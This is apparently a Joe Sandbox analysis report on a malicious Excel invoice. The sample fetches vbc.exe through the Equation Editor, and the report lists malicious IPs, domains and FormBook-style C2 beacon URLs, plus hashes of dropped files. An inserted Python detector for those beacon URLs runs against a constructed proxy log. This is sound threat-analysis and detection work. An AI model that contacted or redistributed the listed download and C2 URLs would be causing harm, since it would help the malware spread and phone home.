http://www.piriform.com/ccleaner | explorer.exe, 00000007.00000000.1022782803.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023411873.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1015998007.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1000541349.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023540631.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1071039162.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.992782338.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1018121045.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1074287002.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.999862011.0000000008512000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069574104.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995167898.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1004984463.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1007078757.0000000004385000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://104.168.33.31/75/vbc.exej | EQNEDT32.EXE, 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://computername/printers/printername/.printer | explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.%s.comPA | explorer.exe, 00000007.00000000.1070008053.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | low
http://www.autoitscript.com/autoit3 | explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://support.mozilla.org | explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.piriform.com/ccleanerv | explorer.exe, 00000007.00000000.1018121045.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1074287002.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995167898.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1007078757.0000000004385000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://servername/isapibackend.dll | explorer.exe, 00000007.00000000.1008792318.0000000006450000.00000002.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | low
Contacted IPs:
IP | Domain | Country | ASN | ASN Name | Malicious
23.81.214.26 | www.yiwanggkm.com | United States | 396190 | LEASEWEB-USA-SEA-10US | true
34.102.136.180 | arjimni.com | United States | 15169 | GOOGLEUS | false
198.54.117.212 | parkingpage.namecheap.com | United States | 22612 | NAMECHEAP-NETUS | false
104.168.33.31 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
164.155.217.57 | www.tw-life.net | South Africa | 26484 | IKGUL-26484US | true
General information:
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 626601
Start date and time: 2022-05-14 15:18:09 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 55s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: DL03327INV.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSX@11/16@5/5
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 42.8% (good quality ratio 41.1%)
• Quality average: 75%
• Quality standard deviation: 28%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 118
• Number of non-executed functions: 62
Cookbook Comments:
• Found application associated with file extension: .xlsx
• Adjust boot time
• Enable AMSI
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Simulations (API interception events):
Time | Type | Description
15:18:43 | API Interceptor | 102x Sleep call for process: EQNEDT32.EXE modified
15:18:57 | API Interceptor | 35x Sleep call for process: yldnat.exe modified
15:19:19 | API Interceptor | 208x Sleep call for process: wuapp.exe modified
15:20:04 | API Interceptor | 1x Sleep call for process: explorer.exe modified
Match | Associated Sample Name / URL | Detection | Context
198.54.117.212 | Notificación de pago.exe | malicious | www.evertribute.com/d6fp/?7nxh=0IAMhpyfM6TyxYvNuQBLxFd+VBe1OVp7bFg/8SsVn3OL4Z0v7SAtnQzd8ZWN+7APMfoM&q6AlF=0txdQnwxgb
198.54.117.212 | DHL Shipment doc.exe | malicious | www.jenaeeaginshair.com/h4st/?S0GPjB=q70XfpQZmlAB2auGq1hAkZwSf/NS/wp1Irfs0GTn4KVIkT9NIixf66nFmV9/9WE3amkk&WBZ89=7nHdAXGHjvCt
198.54.117.212 | TyTasyWsK7.exe | malicious | www.mexicomakes.com/rx29/?v6AhC=MN6pkdshnX0P5&7nr=k5ydulq9kPFauAtXvUGEfm+Uw3krzuQ4zk6zyAvK/KFYX5MlPt6Zlf43oC2uvGdjiRwp78uJoA==
198.54.117.212 | hJyWzS4AWx.exe | malicious | www.fliptheswitch.pro/arh2/?jBSH34H=T/WlQli/iOW99vugx1+QnTRsOFuzNIELOhX8iakrfqWoxVhOncDhQuop0wYTMOKLFMsk&zJ=tbAl28e0JZ
198.54.117.212 | Docs advice copy.exe | malicious | www.wakechallenge.com/gt53/?sX=6pE3ju96WQK0+B5ULgyQSatX/FOaFjpxiDjz3RqOeHNV7XNVwIejoEIqabcy68HR6G0I&9rN0g=iZRXo
198.54.117.212 | 8aHgrjlJZX.exe | malicious | www.themastersmindinternational.net/b26k/?2dO83=023S549G5s7+49AjU60mm3bsBMFCFqgWpKNz3h7pkzB548FzE5lHxr+z5Qhpl82he0RD&6lJt0=fV74GZDPWxkXVl0P
198.54.117.212 | Order-Invoice.xlsx | malicious | www.xmasshoppinglist.com/n6g4/?AN90=3fRxr0YPkX0X&4hP=lk1Ytgy5J4brT9zaTqBsrOyQYj13WzRH2814vK/rD7m77rdlYSBBfE0669SGmlpsTkybbA==
198.54.117.212 | shedy.exe | malicious | www.stirredbythesea.com/rscu/?i6A=arxSzfx+vy09ymVDbp0Epd8jJd3v6Kyn3ZWBqZhnCJdzZczZyGypOb/Ffi3DmoNTXddL&_L04=DBZX-ZDHenAT
198.54.117.212 | Invoice.xlsx | malicious | www.backgammondestinations.net/grh2/?5j=saa8PMbNBjJbbZ+5JbPWtFeepLhSMVnKDuIDi4YjDbFx6SC3hMpc2U1V4hUA4JY6D+3V1w==&Jtxhc=Q6TdP0BHU
198.54.117.212 | Att#1 Price Schedule Piping Blasting & Painting Works.exe | malicious | www.datashen.com/m3ci/?P6MpQr=3fZxO8l8KfdxY&A6Eh0NIX=IK5OCHgBJEmbaHMkAAXzhCR4GjUUUUmjfl7IzxUaHJbHTPnaMaSNGqiN8WYWgIpKB17S
198.54.117.212 | Purchase Order.pdf.exe | malicious | www.popcornpor.xyz/j86w/?B6Y0=otBjagVTshBG9PMS6CzAiq+mY2TM3/piC6jpHh6IKngkOkHz0iRr8aevGg3SgtsHi0+h&6l3=7nJpZxY0EPl0
198.54.117.212 | SecuriteInfo.com.Variant.MSILHeracles.26442.6256.exe | malicious | www.asla-startrans.com/vmqm/?XdyT6=+EEgIBo2TvWWXNzyvuMfn5+Z7EtEbRmFCmkQ0AMAvXSsdH0obtQwD6bjpg7FAm2p0DAs&p67=q8kPXdH0Dlg
198.54.117.212 | SOA.exe | malicious | www.xpressporn.com/3e9r/?Yf9D0lTh=FQdCPUjhXotQoJ4CKAJtfTWZByK+Ojq+iU8IovunNytQ5TMwAp07fKSIvwuA9ysCmDpq&u0Dl=Q4CDzbR0oNK4Ej6
198.54.117.212 | SecuriteInfo.com.W32.AIDetectNet.01.26901.exe | malicious | www.whoreal.net/ahge/?3fBt7b-=QXqSep6ezCFu2G/MW+1Tdu7nu5PwS3oIzH2xWGXsUC7w6nIkdzZdA1SYR8s134ZRgM+iOr0q0g==&e6BL=HFQDdRSP8d
198.54.117.212 | CHECKLIST2200030 NEW ORDER.PDF.exe | malicious | www.dec2005.xyz/g5so/?x6TXzDm=pd9eJYIiKEbx0YgrSOb1By14PZFH7gzgIWi0B/tVurCGPmd3qIAYQPrLIm4ze8RM5paj&khZ4k4=7nwTY
198.54.117.212 | DHL.exe | malicious | www.starcycleglobal.com/a5qd/?JRTXBj=Oa2nZ+2xQG4CaRxNsyIIV+X5yWhkVEnxgErb9O844iygrnkmNvzo/FIaL1UiU28mLXL5&w0GP1=HL08TPDH
198.54.117.212 | FATURA_S.EXE | malicious | www.plainfiles.com/i9ng/?4h=xakOuhDZ+Q5WbrWmVfk4f14ggHG82eXsEmObW4kHQE6LOYZQmZ/WUk6edJZSdGWs57QC&k6A=_ZsLEbjxGHsx
198.54.117.212 | Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe | malicious | www.terrierslovjt.xyz/g6k0/?oT=Hip7CMimOk78gxL5CMPku07nV6Z0o8C0cGWx1eP+ie71BFDKkLr5JgybhXBrWtyrNdPh&vDKd7h=9rjLcdHx-0r
198.54.117.212 | dekonthtml.exe | malicious | www.vacationdealscorp.website/d23n/?x0GLp6V=KF+jwyrZjKxB+2jH5URL+2UV/SD9Gc2YiyRDMrhBOt4TPBFezS+MdmZvHXWfs4XBNCOG&WBg4=5jK4EL4PkLqXtt
198.54.117.212 | Vjw.exe | malicious | www.abcam-global.com/agsj/?S4m=pZukCCpOlxBbeyZwubQhJMgZkI30amTvWY4n5TjO0OxYnGUCit5uPOkfjWsqaaskQ47N&1b=6lL07rrpgL7Hsz
Match | Associated Sample Name / URL | Detection | Context
parkingpage.namecheap.com | inlaww321345.exe | malicious | 198.54.117.212
parkingpage.namecheap.com | Notificación de pago.exe | malicious | 198.54.117.212
parkingpage.namecheap.com | Advice FTT5378393.exe | malicious | 198.54.117.211
parkingpage.namecheap.com | Reference Note PJS-4010036-Ref 18976.exe | malicious | 198.54.117.211
parkingpage.namecheap.com | Ziraat Bankasi Swift Mesaji.exe | malicious | 198.54.117.215
parkingpage.namecheap.com | SecuriteInfo.com.Variant.Jaik.72878.8629.exe | malicious | 198.54.117.217
parkingpage.namecheap.com | ORDERS_S.EXE | malicious | 198.54.117.217
parkingpage.namecheap.com | EMIRATE BANK SWIFT 12-05-2022.exe | malicious | 198.54.117.210
parkingpage.namecheap.com | RewdsccVjn.exe | malicious | 198.54.117.218
parkingpage.namecheap.com | 2YoK0uIVmS.exe | malicious | 198.54.117.218
parkingpage.namecheap.com | Energe 1,010.00.xlsx | malicious | 198.54.117.218
parkingpage.namecheap.com | DHL Shipment doc.exe | malicious | 198.54.117.212
parkingpage.namecheap.com | v444BZjqsC.exe | malicious | 198.54.117.210
parkingpage.namecheap.com | jO7HOv839n.exe | malicious | 198.54.117.215
parkingpage.namecheap.com | TyTasyWsK7.exe | malicious | 198.54.117.212
parkingpage.namecheap.com | Comanda atasata.exe | malicious | 198.54.117.215
parkingpage.namecheap.com | Enquiry 1331 SO 26929.exe | malicious | 198.54.117.217
parkingpage.namecheap.com | ST10501909262401.exe | malicious | 198.54.117.210
parkingpage.namecheap.com | bWFqrKmWuG.exe | malicious | 198.54.117.212
parkingpage.namecheap.com | hJyWzS4AWx.exe | malicious | 198.54.117.212
hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com | doc#011010022.exe | malicious | 18.119.154.66
hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com | New order_27.04.2022.pdf.exe | malicious | 3.140.13.188
hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com | LPGC CIPTA DIAMOND.xlsx | malicious | 18.119.154.66
hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com | SooS.xls | malicious | 3.140.13.188
hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com | invoice.xls | malicious | 3.140.13.188
hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com | doc88.exe | malicious | 18.119.154.66
hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com | ESY12042.EXE | malicious | 3.140.13.188
hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com | vbc.exe | malicious | 3.140.13.188
hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com | Protected copy of the commercial invoice.exe | malicious | 18.119.154.66
hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com | vp65TB0xq1rmUPA.exe | malicious | 18.119.154.66
hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com | IRQ2107797_pdf.exe | malicious | 18.119.154.66
hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com | New TST_SAM_16L SNAP WHITE.exe | malicious | 18.119.154.66
hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com | uEENSyTlon.exe | malicious | 18.119.154.66
hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com | ScannerHSBC202204.exe | malicious | 3.140.13.188
hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com | DHL SHIPMENT NOTIFICATION 284748395PD.exe | malicious | 18.119.154.66
hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com | revised PI876345678.xlsx | malicious | 3.140.13.188
hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com | mskl.exe | malicious | 18.119.154.66
hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com | lr1ytzKWGY.exe | malicious | 18.119.154.66
hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com | PO-768902839.xlsx | malicious | 3.140.13.188
hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com | SWIFT,pdf.exe | malicious | 18.119.154.66
Match | Associated Sample Name / URL | Detection | Context
LEASEWEB-USA-SEA-10 (US) | Inquiry.doc05102022.exe | malicious | 142.234.236.174
LEASEWEB-USA-SEA-10 (US) | sora.arm | malicious | 172.241.159.251
LEASEWEB-USA-SEA-10 (US) | cxFK87hhwM | malicious | 172.241.159.244
LEASEWEB-USA-SEA-10 (US) | Like3EYCgS | malicious | 172.241.159.211
LEASEWEB-USA-SEA-10 (US) | 810gMVdxHV | malicious | 172.241.159.245
LEASEWEB-USA-SEA-10 (US) | arm7 | malicious | 23.82.230.162
LEASEWEB-USA-SEA-10 (US) | UzFT5M5FXm.exe | malicious | 23.106.215.217
LEASEWEB-USA-SEA-10 (US) | gymSqYK5w9 | malicious | 172.241.159.252
LEASEWEB-USA-SEA-10 (US) | joltvU7NHw.exe | malicious | 23.82.156.226
LEASEWEB-USA-SEA-10 (US) | x86 | malicious | 172.241.159.238
LEASEWEB-USA-SEA-10 (US) | b72WXQwmB3 | malicious | 23.19.223.195
LEASEWEB-USA-SEA-10 (US) | xyjcT3XzpC | malicious | 172.241.159.225
LEASEWEB-USA-SEA-10 (US) | M7NtYyxbey.exe | malicious | 23.106.223.243
LEASEWEB-USA-SEA-10 (US) | arm | malicious | 23.19.223.166
LEASEWEB-USA-SEA-10 (US) | Service-Interrupt-1734251127.xlsb | malicious | 23.106.215.210
LEASEWEB-USA-SEA-10 (US) | Service-Interrupt-1734251127.xlsb | malicious | 23.106.215.210
LEASEWEB-USA-SEA-10 (US) | Service-Interrupt-947051958.xlsb | malicious | 23.106.215.210
LEASEWEB-USA-SEA-10 (US) | Service-Interrupt-947051958.xlsb | malicious | 23.106.215.210
LEASEWEB-USA-SEA-10 (US) | Zeus.mpsl | malicious | 172.241.159.233
LEASEWEB-USA-SEA-10 (US) | U prilogu je predracun.exe | malicious | 64.120.2.136
NAMECHEAP-NET (US) | Shipment Documents.exe | malicious | 198.187.30.47
NAMECHEAP-NET (US) | RFQ. 220 & Drawings.exe | malicious | 198.187.30.47
NAMECHEAP-NET (US) | PI PDF.exe | malicious | 198.54.126.161
NAMECHEAP-NET (US) | https://kryptokingtrading.com/webapp/data.php | malicious | 68.65.120.231
NAMECHEAP-NET (US) | https://fedgovapp.com/Maryland-login/ | malicious | 198.54.114.219
NAMECHEAP-NET (US) | http://15u30P6pz0M18W5vt.cam | malicious | 162.255.119.176
NAMECHEAP-NET (US) | Notificación de pago.exe | malicious | 198.54.117.212
NAMECHEAP-NET (US) | LISTA DE ESPECIFICACIONES PO A Y B CON HOJA DE DIBUJO 1,2 y 3.exe | malicious | 198.187.30.47
NAMECHEAP-NET (US) | DHL Receipt_AWB811470484778.exe | malicious | 198.187.30.47
NAMECHEAP-NET (US) | Shipping Documents.exe | malicious | 198.187.30.47
NAMECHEAP-NET (US) | Advice FTT5378393.exe | malicious | 162.0.233.154
NAMECHEAP-NET (US) | http://jbhess.jbhess.africartz.com/amJoZXNzQGhlc3MuY29t | malicious | 199.188.205.217
NAMECHEAP-NET (US) | SOA (2).exe | malicious | 198.54.126.161
NAMECHEAP-NET (US) | http://jbhess.jbhess.africartz.com/amJoZXNzQGhlc3MuY29t | malicious | 199.188.205.217
NAMECHEAP-NET (US) | https://nwfparolinv.org/ | malicious | 68.65.123.205
NAMECHEAP-NET (US) | Order.doc | malicious | 162.0.233.154
NAMECHEAP-NET (US) | SOA.exe | malicious | 198.54.126.161
NAMECHEAP-NET (US) | http://wm8delihrf.purboposchim.online/#.aHR0cHM6Ly9nYXRld2F5LnBpbmF0YS5jbG91ZC9pcGZzL1FtY3A0dDQ5Mm1GOGd5a3dUQ3NBbUJlREZ4ZWlTaG9lUWd5OTRWSE5pWnNIeTc/I3N5bHZpZS5kcmFwZWF1QHNhYXEuZ291di5xYy5jYQ== | malicious | 199.188.206.59
NAMECHEAP-NET (US) | http://wm8delihrf.purboposchim.online/#.aHR0cHM6Ly9nYXRld2F5LnBpbmF0YS5jbG91ZC9pcGZzL1FtY3A0dDQ5Mm1GOGd5a3dUQ3NBbUJlREZ4ZWlTaG9lUWd5OTRWSE5pWnNIeTc/I3N5bHZpZS5kcmFwZWF1QHNhYXEuZ291di5xYy5jYQ== | malicious | 199.188.206.59
NAMECHEAP-NET (US) | SecuriteInfo.com.Variant.Jaik.72878.8629.exe | malicious | 198.54.117.217
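Every C2 URL in the 198.54.117.212 context table above has the same shape: a www. host, a four-character path segment, and a query with exactly two parameters, one carrying a long base64-looking blob (the encrypted check-in) and the other a short token. The following detector, added here as an example and not part of the Joe Sandbox report, turns that observation into a proxy-log check. The character classes and length thresholds are derived only from the twenty URLs listed above, so they are a heuristic for triage rather than a vetted FormBook signature; the squid-style log excerpt is constructed for the example and mixes four URLs from the table with benign look-alikes.

```python
import re
from urllib.parse import urlsplit

# Shape shared by the C2 URLs in the 198.54.117.212 context table:
#   www.<domain>/<4 alnum chars>/?<key>=<value>&<key>=<value>
# Thresholds below come from those URLs only (heuristic, not a vetted signature).
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")
KEY_RE = re.compile(r"^[A-Za-z0-9_-]{1,10}$")
VALUE_RE = re.compile(r"^[A-Za-z0-9+/=_-]+$")
LONG_MIN = 40    # shortest "long" value in the table is 68 characters
SHORT_MAX = 24   # longest "short" value in the table is 16 characters


def split_beacon(url: str):
    """Return (host, path_tag, long_value, short_value) if `url` matches the
    FormBook-style shape above, otherwise None."""
    if "://" not in url:
        url = "http://" + url            # the context table lists URLs without a scheme
    parts = urlsplit(url)
    host = parts.hostname or ""
    if not host.startswith("www.") or not PATH_RE.match(parts.path):
        return None
    # Split the query by hand: parse_qsl() turns '+' into ' ' and percent-decodes,
    # which would break the base64-alphabet check on the long value.
    pairs = [p.split("=", 1) for p in parts.query.split("&")]
    if len(pairs) != 2 or any(len(p) != 2 for p in pairs):
        return None
    if not all(KEY_RE.match(k) and VALUE_RE.match(v) for k, v in pairs):
        return None
    short, long_ = sorted((v for _, v in pairs), key=len)
    if len(short) > SHORT_MAX or len(long_) < LONG_MIN:
        return None
    return host, parts.path.strip("/"), long_, short


def looks_like_formbook_beacon(url: str) -> bool:
    return split_beacon(url) is not None


# Constructed squid-style access log: "ts elapsed client action/code size method url".
# Lines 1-4 use URLs from the context table; lines 5-7 are benign look-alikes
# (a 4-letter path, a short base64 cookie, a long token on a non-www host).
SAMPLE_LOG = """\
1652000001.123 215 10.0.0.12 TCP_MISS/200 412 GET http://www.evertribute.com/d6fp/?7nxh=0IAMhpyfM6TyxYvNuQBLxFd+VBe1OVp7bFg/8SsVn3OL4Z0v7SAtnQzd8ZWN+7APMfoM&q6AlF=0txdQnwxgb
1652000002.456 198 10.0.0.12 TCP_MISS/200 409 GET http://www.mexicomakes.com/rx29/?v6AhC=MN6pkdshnX0P5&7nr=k5ydulq9kPFauAtXvUGEfm+Uw3krzuQ4zk6zyAvK/KFYX5MlPt6Zlf43oC2uvGdjiRwp78uJoA==
1652000003.789 201 10.0.0.12 TCP_MISS/200 400 GET http://www.whoreal.net/ahge/?3fBt7b-=QXqSep6ezCFu2G/MW+1Tdu7nu5PwS3oIzH2xWGXsUC7w6nIkdzZdA1SYR8s134ZRgM+iOr0q0g==&e6BL=HFQDdRSP8d
1652000004.012 190 10.0.0.12 TCP_MISS/200 398 GET http://www.plainfiles.com/i9ng/?4h=xakOuhDZ+Q5WbrWmVfk4f14ggHG82eXsEmObW4kHQE6LOYZQmZ/WUk6edJZSdGWs57QC&k6A=_ZsLEbjxGHsx
1652000005.345 50 10.0.0.13 TCP_HIT/200 12034 GET http://www.example.com/news/?id=4821&lang=en
1652000006.678 61 10.0.0.13 TCP_MISS/200 8812 GET http://www.example.org/abcd/?session=YWJjZA==&page=2
1652000007.901 73 10.0.0.14 TCP_MISS/302 512 GET http://cdn.example.net/a1b2/?k=QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVowMTIzNDU2Nzg5YWJjZGVmZ2hpamtsbW5vcA==&v=1
"""


def scan_proxy_log(text: str):
    """Return (client_ip, host, path_tag) for every log line whose URL matches."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue
        beacon = split_beacon(fields[6])
        if beacon:
            hits.append((fields[2], beacon[0], beacon[1]))
    return hits


if __name__ == "__main__":
    for client, host, tag in scan_proxy_log(SAMPLE_LOG):
        print(f"{client} -> {host} (path tag {tag})")
```

The path tag and host are worth keeping in the output: across the table each campaign uses its own four-character tag, so clustering hits by tag groups infections by build, and the host is the pivot back into the domain and ASN tables. Expect false positives from legitimate sites that happen to use a short path with one long signed parameter, and false negatives for variants that change the URL layout; treat a hit as a lead to confirm against the process tree, not as a verdict.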
                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Category:downloaded
                                                      Size (bytes):263772
                                                      Entropy (8bit):7.907718436240332
                                                      Encrypted:false
                                                      SSDEEP:6144:LOtIO4ysWjl1zKay/DGHe9G78x3c4mfnk1OUgS:LOLSepKvCH78xM4mQOY
                                                      MD5:DE76EF6A11A63EFC00B0303888BC0B7F
                                                      SHA1:7AB24456A49F6B61BC54D20A4D9C0B84F3AE696B
                                                      SHA-256:FC6EBE8BC215A292BB3DF340A84350CEB2BE7187EFC8E10381235CFA8D82F734
                                                      SHA-512:51A5CF0F640D922EC0D8BF5BA3FCC06B6278E3AC45F07190710C5055A23102A614443641D8B6617775D5A786CCB1E9D10404DFA0E146E6C8EC3481C616214D99
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 51%
                                                      Reputation:low
                                                      IE Cache URL:http://104.168.33.31/75/vbc.exe
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:.....F6............@...........................;...........@...........................................;.P............................................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data.....9.........................@....ndata........:..........................rsrc...P.....;.....................@..@................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:ms-windows metafont .wmf
                                                      Category:dropped
                                                      Size (bytes):4630
                                                      Entropy (8bit):5.070400845866794
                                                      Encrypted:false
                                                      SSDEEP:96:RmljFSTwLmSaj2W67xYK2dlEtF622okgmCCHtkTl9ggBgThsMihEylB8By98Rj:UlRSkCSajh6tL2dlEtFV2VgmVNkTl9gJ
                                                      MD5:1A4FF280B6D51A6ED16C3720AF1CD6EE
                                                      SHA1:277878BEF42DAC8BB79E15D3229D7EEC37CE22D9
                                                      SHA-256:E5D86DD19EE52EBE2DA67837BA4C64454E26B7593FAC8003976D74FF848956E7
                                                      SHA-512:3D41BAF77B0BEEF85C112FCBD3BE30E940AF1E586C4F9925DBDD67544C5834ED794D0042A6F6FF272B21D1106D798CBB05FA2848A788A3DAFE9CFBC8574FCECA
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:...................[R..................................D.^...................-...................".....-...........................".....-.....................-...............$...........o.............................-...............-.......-.....................-...............$.......W.....i...T.........-...............-.......-.....................-...........>...$.....~.........................z...m.....H.v.....?.........................|...r...f...Z...L...>...0... .............~.....-...............-.......-.....................-...........6...$.....................................-...?...U...n...........!...!.........................................-...............-.......-.....................-...........8...$.......................s...e.g.\.L.Y./.[..._...g...p...~.............'.../...L.v.g.i...V...@...'...............-...............-.......-.....................-........... ...$.......................r...{...................................-...............-.......-...........
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:ms-windows metafont .wmf
                                                      Category:dropped
                                                      Size (bytes):4630
                                                      Entropy (8bit):5.070400845866794
                                                      Encrypted:false
                                                      SSDEEP:96:RmljFSTwLmSaj2W67xYK2dlEtF622okgmCCHtkTl9ggBgThsMihEylB8By98Rj:UlRSkCSajh6tL2dlEtFV2VgmVNkTl9gJ
                                                      MD5:1A4FF280B6D51A6ED16C3720AF1CD6EE
                                                      SHA1:277878BEF42DAC8BB79E15D3229D7EEC37CE22D9
                                                      SHA-256:E5D86DD19EE52EBE2DA67837BA4C64454E26B7593FAC8003976D74FF848956E7
                                                      SHA-512:3D41BAF77B0BEEF85C112FCBD3BE30E940AF1E586C4F9925DBDD67544C5834ED794D0042A6F6FF272B21D1106D798CBB05FA2848A788A3DAFE9CFBC8574FCECA
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:...................[R..................................D.^...................-...................".....-...........................".....-.....................-...............$...........o.............................-...............-.......-.....................-...............$.......W.....i...T.........-...............-.......-.....................-...........>...$.....~.........................z...m.....H.v.....?.........................|...r...f...Z...L...>...0... .............~.....-...............-.......-.....................-...........6...$.....................................-...?...U...n...........!...!.........................................-...............-.......-.....................-...........8...$.......................s...e.g.\.L.Y./.[..._...g...p...~.............'.../...L.v.g.i...V...@...'...............-...............-.......-.....................-........... ...$.......................r...{...................................-...............-.......-...........
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:ms-windows metafont .wmf
                                                      Category:dropped
                                                      Size (bytes):1970
                                                      Entropy (8bit):5.125773446782967
                                                      Encrypted:false
                                                      SSDEEP:48:KxK48S3oEL48I+KL48uL48kL48tnL48I0L48Ih2L48Ls4fnPK6L48tOL48bCb3RM:KxKS3okSuEtN1O2FfUcM
                                                      MD5:30935B0D56A69E2E57355F8033ADF98B
                                                      SHA1:5F7C13E36023A1B3B3DAF030291C02631347C2AB
                                                      SHA-256:077232D301E2DF2E2702BD9E7323806AC20134F989C8A4102403ECBF5E91485E
                                                      SHA-512:5D633D1EC5559443D3DA5FAD2C0CFC5DBF6A006EF6FBEE8C47595A916A899FBDF713897289E99EE62C07B52CCB61578253791AC57712DF040469F21287A742E9
                                                      Malicious:false
